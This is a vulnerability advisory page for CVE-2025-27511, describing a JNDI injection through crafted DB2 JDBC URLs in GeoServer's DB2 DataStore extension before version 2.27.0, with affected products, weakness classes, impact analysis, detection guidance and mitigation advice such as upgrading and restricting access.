CVE-2025-27511
Undergoing Analysis Undergoing Analysis - In Progress
JNDI Attack via DB2 JDBC URL in GeoServer DB2 DataStore Extension

Publication date: 2026-06-18

Last updated on: 2026-06-18

Assigner: GitHub, Inc.

Description
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.27.0 of the GeoServer DB2 DataStore Extension, an administrator can perform a JNDI attack through specially crafted DB2 jdbc url leading to to Remote Code Execution (RCE). Version 2.27.0 fixes the issue.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-06-18
Last Modified
2026-06-18
Generated
2026-06-19
AI Q&A
2026-06-18
EPSS Evaluated
N/A
NVD
CVE-2025-27511
EUVD
EUVD-2025-210276
Affected Vendors & Products
Showing 6 associated CPEs
Vendor Product Version / Range
geoserver db2_datastore_extension to 2.27.0 (exc)
geoserver geoserver 2.27.0
ibm db2_jdbc_driver 10.5
ibm db2_jdbc_driver 11.1
ibm db2_jdbc_driver 11.5
geoserver geoserver_db2_datastore_extension to 2.27.0 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-502 The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Impact Analysis

This vulnerability can have serious impacts including unauthorized remote code execution on the affected GeoServer instance.

Because the attack requires high privileges but no user interaction, an attacker with administrative access can exploit this to compromise the confidentiality, integrity, and availability of the system.

  • Confidentiality impact: Sensitive geospatial data could be exposed or altered.
  • Integrity impact: Data and system configurations could be modified maliciously.
  • Availability impact: The system could be disrupted or taken offline by executing arbitrary code.
Executive Summary

The vulnerability in GeoServer's DB2 DataStore Extension prior to version 2.27.0 allows an administrator to perform a JNDI attack through a specially crafted DB2 JDBC URL. This attack can lead to Remote Code Execution (RCE).

Specifically, authenticated users with access to the Vector Data Sources page can create a new DB2 data store with unrestricted connection parameters. This enables the attacker to exploit the JNDI attack and cause deserialization of untrusted data, resulting in RCE.

The vulnerability is tracked under CWE-502 (Deserialization of Untrusted Data) and has a high severity rating with a CVSS score of 7.2.

Detection Guidance

The vulnerability involves a JNDI attack through a specially crafted DB2 JDBC URL in GeoServer's DB2 DataStore Extension prior to version 2.27.0. Detection would focus on identifying attempts to create or modify DB2 data stores with suspicious or unusual JDBC URLs that could trigger JNDI lookups.

Since the attack requires authenticated users with high privileges accessing the Vector Data Sources page, monitoring logs for creation or modification of DB2 data stores and inspecting JDBC URLs for unusual JNDI references can help detect exploitation attempts.

Specific commands are not provided in the available resources, but general approaches include:

  • Review GeoServer logs for DB2 datastore creation or modification events.
  • Search for JDBC URLs containing JNDI references or unusual patterns in configuration files or database entries.
  • Use network monitoring tools to detect suspicious outbound JNDI lookups or LDAP requests originating from the GeoServer host.
Mitigation Strategies

The primary mitigation step is to upgrade GeoServer's DB2 DataStore Extension to version 2.27.0 or later, as this version contains the fix for the vulnerability.

Additionally, restrict access to the Vector Data Sources page to only trusted administrators with necessary privileges to prevent unauthorized creation or modification of DB2 data stores.

Implement monitoring and alerting on changes to DB2 datastore configurations and suspicious JDBC URLs to detect potential exploitation attempts early.

Consider network-level controls to block or monitor outbound JNDI or LDAP requests from the GeoServer host to reduce the risk of remote code execution.

Compliance Impact

The provided information does not specify how the CVE-2025-27511 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2025-27511. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart